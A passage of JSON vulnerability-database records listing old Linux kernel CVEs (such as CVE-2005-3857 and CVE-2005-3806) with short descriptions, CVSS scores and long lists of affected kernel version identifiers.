"cpe:2.3:o:linux:linux_kernel:2.6.12.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.13.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.16:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.33:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.30:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.37.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.35.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.33.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.34.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.30:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.33.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.12.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.19:*:-pre1:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.36.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.18:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.18:*:pre-3:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.29:-rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.31:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.18:*:pre-1:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.33.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.14:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.28:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.18:*:pre-6:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.20:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.32:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.12.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.18:*:x86:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.34.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.21:*:-pre7:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.27:*:-pre2:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11.1:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:22:22", "description": "The time_out_leases function in locks.c for Linux kernel before 2.6.15-rc3 allows local users to cause a denial of service (kernel log message consumption) by causing a large number of broken leases, which is recorded to the log using the printk function.", "edition": 5, "cvss3": {}, "published": "2005-11-27T21:03:00", "title": "CVE-2005-3857", "type": "cve", "cwe": ["CWE-399"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2005-3857"], "modified": "2018-10-19T15:39:00", "cpe": ["cpe:/o:linux:linux_kernel:2.6.14.4", "cpe:/o:linux:linux_kernel:2.6.4", "cpe:/o:linux:linux_kernel:2.6.11.7", "cpe:/o:linux:linux_kernel:2.6.11.8", "cpe:/o:linux:linux_kernel:2.6.12.3", "cpe:/o:linux:linux_kernel:2.6.14.1", "cpe:/o:linux:linux_kernel:2.6.14.7", "cpe:/o:linux:linux_kernel:2.6.12", "cpe:/o:linux:linux_kernel:2.6.8", "cpe:/o:linux:linux_kernel:2.6.1", "cpe:/o:linux:linux_kernel:2.6.14", "cpe:/o:linux:linux_kernel:2.6.11.2", "cpe:/o:linux:linux_kernel:2.6.11.11", "cpe:/o:linux:linux_kernel:2.6.12.5", "cpe:/o:linux:linux_kernel:2.6.13", "cpe:/o:linux:linux_kernel:2.6.11.9", "cpe:/o:linux:linux_kernel:2.6.14.5", "cpe:/o:linux:linux_kernel:2.6.3", "cpe:/o:linux:linux_kernel:2.6.14.2", "cpe:/o:linux:linux_kernel:2.6.11.10", "cpe:/o:linux:linux_kernel:2.6.6", "cpe:/o:linux:linux_kernel:2.6.12.1", "cpe:/o:linux:linux_kernel:2.6.5", "cpe:/o:linux:linux_kernel:2.6.14.3", "cpe:/o:linux:linux_kernel:2.6.0", "cpe:/o:linux:linux_kernel:2.6.2", "cpe:/o:linux:linux_kernel:2.6.13.2", "cpe:/o:linux:linux_kernel:2.6.13.5", "cpe:/o:linux:linux_kernel:2.6.9", "cpe:/o:linux:linux_kernel:2.6.10", "cpe:/o:linux:linux_kernel:2.6.11.12", "cpe:/o:linux:linux_kernel:2.6.11", "cpe:/o:linux:linux_kernel:2.6.11.6", "cpe:/o:linux:linux_kernel:2.6.13.4", "cpe:/o:linux:linux_kernel:2.6.11.4", "cpe:/o:linux:linux_kernel:2.6.12.4", "cpe:/o:linux:linux_kernel:2.6.7", "cpe:/o:linux:linux_kernel:2.6.15", "cpe:/o:linux:linux_kernel:2.6.11.1", "cpe:/o:linux:linux_kernel:2.6.8.1", "cpe:/o:linux:linux_kernel:2.6.11.5", "cpe:/o:linux:linux_kernel:2.6.12.6", "cpe:/o:linux:linux_kernel:2.6.13.1", "cpe:/o:linux:linux_kernel:2.6.11.3", "cpe:/o:linux:linux_kernel:2.6.14.6", "cpe:/o:linux:linux_kernel:2.6.12.2", "cpe:/o:linux:linux_kernel:2.6.13.3"], "id": "CVE-2005-3857", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-3857", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:2.6.11.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.3:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.12.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.14.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.13:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.12:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.14:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.6:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.13.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.14.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.12:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.9:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.8.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.13.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.14:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.5:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.13.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.13:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.12:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.10:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.12.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.13:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.4:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.2:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.2:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.4:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.12.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.14.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.2:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.3:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.8:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.0:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.13:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.8:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.13:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.14:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.12:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.8:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.14.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.9:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.6:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.14.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.15:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.14:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.13:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.8:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.6:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.13:rc7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.1:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.12:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.15:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.5:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.12.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.7:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.13.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.1:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.7:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.1:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.14.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.9:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.10:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.4:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.3:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.12.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.7:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.12:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.9:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.14:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.12.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.10:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.13:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.5:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.3:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.14:rc2:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T11:33:39", "description": "SUSE Linux Enterprise Server 9 on the S/390 platform does not properly handle a certain privileged instruction, which allows local users to gain root privileges.", "edition": 3, "cvss3": {}, "published": "2005-01-27T05:00:00", "title": "CVE-2004-0887", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2004-0887"], "modified": "2017-07-11T01:30:00", "cpe": ["cpe:/o:linux:linux_kernel:2.6.4", "cpe:/o:linux:linux_kernel:2.6.8", "cpe:/o:linux:linux_kernel:2.6.1", "cpe:/o:linux:linux_kernel:2.6.3", "cpe:/o:linux:linux_kernel:2.6.6", "cpe:/o:linux:linux_kernel:2.6.5", "cpe:/o:linux:linux_kernel:2.6.0", "cpe:/o:linux:linux_kernel:2.6.2", "cpe:/o:linux:linux_kernel:2.6.9", "cpe:/o:linux:linux_kernel:2.6.10", "cpe:/o:linux:linux_kernel:2.6.7", "cpe:/o:suse:suse_linux:9.0"], "id": "CVE-2004-0887", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0887", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:2.6.6:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.10:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.6:*:*:*:*:*:*:*", "cpe:2.3:o:suse:suse_linux:9.0:*:enterprise_server:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.0:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.8:rc2:*:*:*:*:*:*", "cpe:2.3:o:suse:suse_linux:9.0:*:s_390:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.8:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.9:2.6.20:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.8:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.1:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.1:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.7:rc1:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T11:33:39", "description": "Race condition in Linux kernel 2.6 allows local users to read the environment variables of another process that is still spawning via /proc/.../cmdline.", "edition": 3, "cvss3": {}, "published": "2005-01-10T05:00:00", "title": "CVE-2004-1058", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 1.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 1.2, "vectorString": "AV:L/AC:H/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2004-1058"], "modified": "2018-10-03T21:29:00", "cpe": ["cpe:/o:linux:linux_kernel:2.6.4", "cpe:/o:linux:linux_kernel:2.6.8", "cpe:/o:linux:linux_kernel:2.6.1", "cpe:/o:linux:linux_kernel:2.6.3", "cpe:/o:linux:linux_kernel:2.6.6", "cpe:/o:linux:linux_kernel:2.6.5", "cpe:/o:linux:linux_kernel:2.6.0", "cpe:/o:linux:linux_kernel:2.6.2", "cpe:/o:linux:linux_kernel:2.6.9", "cpe:/o:linux:linux_kernel:2.6.10", "cpe:/o:linux:linux_kernel:2.6.7", "cpe:/o:ubuntu:ubuntu_linux:4.1", "cpe:/o:linux:linux_kernel:2.6_test9_cvs"], "id": "CVE-2004-1058", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1058", "cvss": {"score": 1.2, "vector": "AV:L/AC:H/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:2.6.0:test2:*:*:*:*:*:*", "cpe:2.3:o:ubuntu:ubuntu_linux:4.1:*:ppc:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.0:test9:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.0:test11:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.6:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.0:test7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.10:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.0:test5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.0:test3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6_test9_cvs:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.0:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.8:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.8:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.7:*:*:*:*:*:*:*", "cpe:2.3:o:ubuntu:ubuntu_linux:4.1:*:ia64:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.9:2.6.20:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.8:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.0:test6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.1:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.0:test8:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.1:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.0:test4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.7:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.0:test1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.0:test10:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T11:34:57", "description": "The IPv6 flow label handling code (ip6_flowlabel.c) in Linux kernels 2.4 up to 2.4.32 and 2.6 before 2.6.14 modifies the wrong variable in certain circumstances, which allows local users to corrupt kernel memory or cause a denial of service (crash) by triggering a free of non-allocated memory.", "edition": 3, "cvss3": {}, "published": "2005-11-25T21:03:00", "title": "CVE-2005-3806", "type": "cve", "cwe": ["CWE-399"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.6, "vectorString": "AV:L/AC:L/Au:N/C:N/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 9.2, "obtainUserPrivilege": false}, "cvelist": ["CVE-2005-3806"], "modified": "2018-10-19T15:39:00", "cpe": ["cpe:/o:linux:linux_kernel:2.4.27", "cpe:/o:linux:linux_kernel:2.6.4", "cpe:/o:linux:linux_kernel:2.4.21", "cpe:/o:linux:linux_kernel:2.6.11.7", "cpe:/o:linux:linux_kernel:2.6.11.8", "cpe:/o:linux:linux_kernel:2.4.24_ow1", "cpe:/o:linux:linux_kernel:2.6.12.3", "cpe:/o:linux:linux_kernel:2.4.11", "cpe:/o:linux:linux_kernel:2.6.12", "cpe:/o:linux:linux_kernel:2.6.8", "cpe:/o:linux:linux_kernel:2.6.1", "cpe:/o:linux:linux_kernel:2.4.20", "cpe:/o:linux:linux_kernel:2.4.14", "cpe:/o:linux:linux_kernel:2.6.14", "cpe:/o:linux:linux_kernel:2.6.11.2", "cpe:/o:linux:linux_kernel:2.6.11.11", "cpe:/o:linux:linux_kernel:2.4.26", "cpe:/o:linux:linux_kernel:2.4.23_ow2", "cpe:/o:linux:linux_kernel:2.6.13", "cpe:/o:linux:linux_kernel:2.4.25", "cpe:/o:linux:linux_kernel:2.6.11.9", "cpe:/o:linux:linux_kernel:2.4.2", "cpe:/o:linux:linux_kernel:2.6.3", "cpe:/o:linux:linux_kernel:2.4.22", "cpe:/o:linux:linux_kernel:2.6.11.10", "cpe:/o:linux:linux_kernel:2.4.18", "cpe:/o:linux:linux_kernel:2.4.30", "cpe:/o:linux:linux_kernel:2.6.6", "cpe:/o:linux:linux_kernel:2.6.12.1", "cpe:/o:linux:linux_kernel:2.6.5", "cpe:/o:linux:linux_kernel:2.4.16", "cpe:/o:linux:linux_kernel:2.6.0", "cpe:/o:linux:linux_kernel:2.6.2", "cpe:/o:linux:linux_kernel:2.4.23", "cpe:/o:linux:linux_kernel:2.4.12", "cpe:/o:linux:linux_kernel:2.6.9", "cpe:/o:linux:linux_kernel:2.6.10", "cpe:/o:linux:linux_kernel:2.6.11.12", "cpe:/o:linux:linux_kernel:2.6.11", "cpe:/o:linux:linux_kernel:2.4.13", "cpe:/o:linux:linux_kernel:2.6.11.6", "cpe:/o:linux:linux_kernel:2.4.31", "cpe:/o:linux:linux_kernel:2.4.0", "cpe:/o:linux:linux_kernel:2.4.28", "cpe:/o:linux:linux_kernel:2.4.10", "cpe:/o:linux:linux_kernel:2.6.11.4", "cpe:/o:linux:linux_kernel:2.6.12.4", "cpe:/o:linux:linux_kernel:2.6.7", "cpe:/o:linux:linux_kernel:2.4.19", "cpe:/o:linux:linux_kernel:2.6.11.1", "cpe:/o:linux:linux_kernel:2.6.8.1", "cpe:/o:linux:linux_kernel:2.6.11.5", "cpe:/o:linux:linux_kernel:2.4.3", "cpe:/o:linux:linux_kernel:2.4.32", "cpe:/o:linux:linux_kernel:2.4.17", "cpe:/o:linux:linux_kernel:2.4.1", "cpe:/o:linux:linux_kernel:2.4.15", "cpe:/o:linux:linux_kernel:2.6.11.3", "cpe:/o:linux:linux_kernel:2.6.12.2", "cpe:/o:linux:linux_kernel:2.4.29", "cpe:/o:linux:linux_kernel:2.4.24"], "id": "CVE-2005-3806", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-3806", "cvss": {"score": 6.6, "vector": "AV:L/AC:L/Au:N/C:N/I:C/A:C"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:2.4.0:test12:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.0:test2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.15:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.0:test11:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.24_ow1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.13:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.27:pre3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.25:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.27:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.14:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.27:pre4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.0:test8:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.31:pre1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.23_ow2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.19:pre2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.0:test9:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.8.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.0:test7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.17:*:*:*:*:*:*:*", 